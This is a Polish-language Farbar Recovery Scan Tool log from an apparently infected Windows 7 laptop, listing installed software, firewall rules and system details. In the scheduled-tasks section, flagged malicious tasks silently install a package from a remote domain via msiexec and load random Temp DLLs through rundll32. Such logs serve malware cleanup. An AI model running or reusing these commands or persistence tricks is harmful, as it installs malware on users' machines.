Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja: 18-02-2019
Uruchomiony przez Soska (20-02-2019 11:14:44)
Uruchomiony z C:\Users\Soska\Downloads
Microsoft Windows 7 Home Premium Service Pack 1 (X86) (2016-10-23 19:53:31)
Tryb startu: Normal
==========================================================

==================== Konta użytkowników: =============================

Administrator (S-1-5-21-1196631564-2932191510-2940953793-500 - Administrator - Disabled)
Gość (S-1-5-21-1196631564-2932191510-2940953793-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1196631564-2932191510-2940953793-1002 - Limited - Enabled)
Soska (S-1-5-21-1196631564-2932191510-2940953793-1000 - Administrator - Enabled) => C:\Users\Soska

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

Adobe Acrobat Reader DC - Polish (HKLM\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 19.010.20091 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
ATI Catalyst Install Manager (HKLM\...\{D001278B-867A-5FD6-BF2E-DA170DB1E9FC}) (Version: 3.0.741.0 - ATI Technologies, Inc.)
Bing Bar (HKLM\...\{3611CA6C-5FCA-4900-A329-6A118123CCFC}) (Version: 7.1.355.0 - Microsoft Corporation)
Blobby Volley 2 Version 1.0 (HKLM\...\Blobby Volley 2 Version 1.0_is1) (Version: - )
ccc-core-static (HKLM\...\{3F07DEBB-DDFA-71A5-4833-FD7B4570099A}) (Version: 2009.0813.2131.36817 - Nazwa firmy) Hidden
Dolby Control Center (HKLM\...\{87725CEF-1BC6-47C5-B2CD-96DD6D392EE3}) (Version: 2.2.1 - Dolby)
Energy Management (HKLM\...\{AE1E24C2-E720-42D5-B8E1-48F71A97B4DB}) (Version: 4.3.1.4 - Lenovo)
HP Deskjet 2050 J510 series — badanie mające na celu poprawę produktów (HKLM\...\{25F1DB60-93BB-4593-AF67-13CFC7B28AF1}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2050 J510 series — podstawowe oprogramowanie urządzenia (HKLM\...\{7DE87E06-A839-4E7E-A447-348139755946}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2050 J510 series Pomoc (HKLM\...\{7A3DF2E2-CF13-44FB-A93E-F71D5381DB3F}) (Version: 140.0.61.61 - Hewlett Packard)
HP Photo Creations (HKLM\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
IC_Katalog ONLINE (HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\...\2f3530a7666b3c93) (Version: 2.71.0.0 - Inter Cars)
Java 7 Update 51 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)
Manager (HKLM\...\{8DED36D9-54D6-4127-A112-5A1BA1CDD66B}) (Version: 5.0.26.33533 - 2017 pdfforge GmbH. All rights reserved) Hidden
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Mozilla Firefox 65.0.1 (x86 en-US) (HKLM\...\Mozilla Firefox 65.0.1 (x86 en-US)) (Version: 65.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 65.0.1 - Mozilla)
Nero 7 Essentials (HKLM\...\{81CD6232-10F5-4832-B3DA-1B88B1571045}) (Version: 7.02.5851 - Nero AG)
PCMSCAN (HKLM\...\{979B748C-6095-4A5A-BC7B-C15E720529D6}) (Version: 2.4.12 - Palmer Performance Engineering)
Picasa 3 (HKLM\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
PL-2303 USB-to-Serial (HKLM\...\{ECC3713C-08A4-40E3-95F1-7D0704F1CE5E}) (Version: 1.2.10 - Prolific Technology INC)
Polski pakiet językowy dla programu Microsoft .NET Framework 4.5 PLK (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1045) (Version: 4.5.50709 - Microsoft Corporation)
Polski VAG 2.5 (HKLM\...\Polski VAG 2.5_is1) (Version: 2.502 - www.obd2.pl)
PX Profile Update (HKLM\...\{E4C850CE-C78B-4E21-57C5-C297829ADD9B}) (Version: 1.00.1. - AMD) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0005 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5911 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30095 - Realtek Semiconductor Corp.)
ScanTool.net for Windows v1.13 (HKLM\...\ScanTool.net for Windows) (Version: v1.13 - ScanTool.net, LLC)
Testy kategorie C, D, T 4.1.4 (HKLM\...\Testy kategoria CDT LKCDT-342_is1) (Version: - Liwona sp. z o.o.)
WinRAR 5.40 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL -> Brak pliku
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\atiacmxx.dll [2009-08-13] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {147AF673-AF77-48BC-9B40-99721F0DD954} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software)
Task: {3D83E7A3-901D-4274-9E92-251C2ABF632F} - System32\Tasks\snf => C:\ProgramData\Polygen\Polygen.exe <==== UWAGA
Task: {52D2D139-D072-4B44-98B0-08038738C44F} - System32\Tasks\QYuopVyvriCPHaS => rundll32 "C:\Users\Soska\AppData\Local\Temp\nNxWrSPqpNrwsoEyy\CYXMGbcuXGPPliuU\gAsyVFa.dll",#1 /adp WIRF3EJRF4GKRF5WJRF4DKRF1ZIRF0KKRF7FKRF3BKRF2UJRF6EIRF1XIRF9PIRF6MJRF1UIRF5 /site_id 721.160122592_131566 <==== UWAGA
Task: {5C7F14DE-47AC-4A48-98AB-AFCA0D43B8D8} - System32\Tasks\Update => C:\Users\Soska\AppData\Roaming\Microsoft\taskhostw.exe <==== UWAGA
Task: {6BE002B9-5EE9-4F1C-AC3E-A0546467C9EA} - System32\Tasks\HP Deskjet 2050 J510 series.exe_{60C41FA8-B056-47B8-904A-FDAA9AC6C755} => C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\HP Deskjet 2050 J510 series.exe (Hewlett Packard -> Hewlett-Packard Co.)
Task: {95F14659-9631-45E4-BA0A-B18BDF73B2B6} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {9FAA5757-D279-4811-AD2C-69E5861B3414} - System32\Tasks\{D7AF84F9-55A4-449B-4E1E-473FFEAA2DF3} => C:\Program Files\Common Files\deuNeyt.exe
Task: {C403196C-5784-49C7-903C-DA80E8567BF4} - System32\Tasks\{C9747E93-B4A0-5296-15F9-4A926916721D} => "msiexec.exe" /i hxxps://refreshnerer711rb.info/Fv587VcC3.57X /q <==== UWAGA
Task: {E207F58D-FAF2-44A1-8629-023648108556} - System32\Tasks\daZUxYAWxkQuTWt => rundll32 "C:\Users\Soska\AppData\Local\Temp\nNxWrSPqpNrwsoEyy\nGeBvHGpNdcwfUFg\XhhEltS.dll",#1 /adp RJRF0MJRF0DJRF1AJRF4LKRF8EJRF3GIRF0YIRF5LKRF2SJRF7WIRF7GKRF5BJRF0YIRF8HKRF3 /site_id 754 <==== UWAGA
Task: {F17A1BCA-23D7-48C1-8410-4840B332743C} - System32\Tasks\snp => C:\ProgramData\Polygen\Polygen.exe <==== UWAGA
Task: {F7EFEC64-2C3D-49FB-AFC8-7D5B6360D1D1} - System32\Tasks\HPCustParticipation HP Deskjet 2050 J510 series => C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\HPCustPartic.exe (Hewlett Packard -> Hewlett-Packard Co.)
Task: {FB46AAC0-AAD1-49FF-9C9E-1D24604576F3} - System32\Tasks\Opera scheduled Autoupdate 2796787680 => C:\Users\Soska\AppData\Roaming\Microsoft\Windows\virstcec\ftdwvibr.exe () [Brak podpisu cyfrowego]

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

==================== Skróty & WMI ========================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
Shortcut: C:\Users\Public\Desktop\Testy kategorie C, D, T.lnk -> C:\Program Files\Testy kategorie C, D, T\Start.bat ()
ShortcutWithArgument: C:\Users\Soska\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Soska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Soska\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%

==================== Załadowane moduły (filtrowane) ==============

2016-11-02 16:40 - 2008-12-20 03:20 - 000063304 _____ () C:\Program Files\Lenovo\Energy Management\kbdhook.dll
2016-11-02 16:40 - 2008-12-20 03:20 - 000051016 _____ () C:\Program Files\Lenovo\Energy Management\HookLib.dll
2008-05-21 10:59 - 2008-05-21 10:59 - 000016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2016-11-02 16:43 - 2016-11-02 16:43 - 000270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)

AlternateDataStreams: C:\Windows\system32\config\systemprofile:.repos [6040196]

==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)

==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

IE trusted site: HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2009-07-14 03:04 - 2019-02-20 11:01 - 000000035 _____ C:\Windows\system32\drivers\etc\hosts

==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-1196631564-2932191510-2940953793-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Soska\AppData\Roaming\Mozilla\Firefox\Tapeta pulpitu.bmp
DNS Servers: 192.168.8.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

Załączenie wejścia w fixlist spowoduje jego usunięcie.

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [{C2F545D3-D65C-4C4A-B81D-2DC41C679238}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{37704D7A-6F6B-4A0F-8E0F-BB9AA9AFA0C8}] => (Allow) C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\USBSetup.exe (Hewlett Packard -> Hewlett-Packard Co.)
FirewallRules: [{E080C520-7E2D-42C5-99AF-71B434AA34D2}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0917\HPDiagnosticCoreUI.exe Brak pliku
FirewallRules: [{4BC68413-84F4-4757-B7E9-0D4F3607EDC6}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0917\HPDiagnosticCoreUI.exe Brak pliku
FirewallRules: [{D2F4292A-4A7B-43F7-9380-387C12406DE7}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0C99\HPDiagnosticCoreUI.exe Brak pliku
FirewallRules: [{AD6A5CF5-F681-45E7-974E-A43247FA57E7}] => (Allow) C:\Users\Soska\AppData\Local\Temp\7zS0C99\HPDiagnosticCoreUI.exe Brak pliku
FirewallRules: [{9797F2BA-37A1-4470-9C0B-FB412D8ADE3F}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )
FirewallRules: [{62959B8A-8529-4D4F-95D5-9AB84ABCAD3C}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )
FirewallRules: [{DFCFE604-3572-422A-B708-13C6EF165E53}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{0BDBFE70-831D-430A-B7A1-441A0345A66B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{062C455B-6652-4E58-89FF-412AC57C1703}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )
FirewallRules: [{8B5BFCE5-2E3E-4D7F-981F-B8EC139A80A9}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )
FirewallRules: [{21EDC8BF-8A3A-4D91-9A26-7AB54C7545EF}] => (Allow) C:\Windows\system32\InstallShield\x32\setup.exe (Ghisler Software GmbH -> )

==================== Punkty Przywracania systemu =========================

10-02-2019 15:22:07 Windows Update
10-02-2019 17:47:40 Installed Java 7 Update 51
19-02-2019 16:58:57 Installed PCMSCAN
19-02-2019 17:05:33 Installed Silicon Laboratories CP210x VCP Drivers for Windows XP
19-02-2019 17:07:25 Installed Silicon Laboratories CP210x VCP Drivers for Windows 20
19-02-2019 17:27:08 Installed Silicon Laboratories CP210x VCP Drivers for Windows XP
19-02-2019 17:28:45 Configured Silicon Laboratories CP210x VCP Drivers for Windows X
19-02-2019 17:30:23 Removed Silicon Laboratories CP210x VCP Drivers for Windows XP/2
19-02-2019 17:31:01 Removed Silicon Laboratories CP210x VCP Drivers for Windows 2000
19-02-2019 17:58:00 Installed PL-2303 USB-to-Serial
19-02-2019 18:19:42 Removed WhiteClick
19-02-2019 18:46:04 Removed Silicon Laboratories CP210x VCP Drivers for Windows XP/2

==================== Wadliwe urządzenia w Menedżerze urządzeń =============

Name: Generic Bluetooth Adapter
Description: Generic Bluetooth Adapter
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: GenericAdapter
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (02/20/2019 11:05:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Dziennik System:
=============
Error: (02/20/2019 11:02:42 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: Serwer {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} nie zarejestrował się w modelu DCOM w wymaganym czasie.

==================== Statystyki pamięci ===========================

Procesor: Genuine Intel(R) CPU U4100 @ 1.30GHz
Procent pamięci w użyciu: 56%
Całkowita pamięć fizyczna: 3066.54 MB
Dostępna pamięć fizyczna: 1340.14 MB
Całkowita pamięć wirtualna: 6131.36 MB
Dostępna pamięć wirtualna: 4290.26 MB

==================== Dyski ================================

Drive c: () (Fixed) (Total:97.56 GB) (Free:41.87 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)]
Drive d: () (Fixed) (Total:135.23 GB) (Free:118.92 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 6067ECBA)
Partition 1: (Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=135.2 GB) - (Type=07 NTFS)

==================== Koniec Addition.txt ============================